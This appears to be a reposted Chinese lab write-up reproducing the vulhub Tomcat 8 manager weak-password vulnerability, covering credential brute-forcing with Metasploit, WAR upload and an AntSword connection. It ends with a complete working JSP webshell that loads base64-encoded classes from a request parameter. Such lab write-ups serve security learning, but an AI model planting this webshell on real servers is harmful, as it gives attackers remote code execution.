vulhub Tomcat8漏洞复现
生活随笔
收集整理的這篇文章主要介紹了
vulhub Tomcat8漏洞复现
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
vulhub Tomcat8漏洞復(fù)現(xiàn)
搭建一下Tomcat8這個(gè)漏洞的環(huán)境
?
查看端口發(fā)現(xiàn)是8080端口開放
?
可以看到環(huán)境已經(jīng)搭建好了
?
嘗試登錄問題頁面,發(fā)現(xiàn)需要輸入密碼http://...:8080/manager/html
?
用msf
?
?
得到弱口令
?
成功登入后臺(tái)
?
此處可上傳文件,嘗試上傳webshell
?
上傳jsp一句話木馬,打包為war格式
上傳出現(xiàn)報(bào)錯(cuò),403是無權(quán)訪問不代表沒有
?
發(fā)現(xiàn)已經(jīng)上傳上去了
?
訪問該目錄,未找到shell.jsp
?
嘗試用命令去打包war包,再次訪問,成功
?
利用蟻劍去連接
?
?
?<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}%><%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}%> #一句話木馬總結(jié)
以上是生活随笔為你收集整理的vulhub Tomcat8漏洞复现的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: mysql5.7.x 1251_MySq
- 下一篇: SlickEdit配置保存路径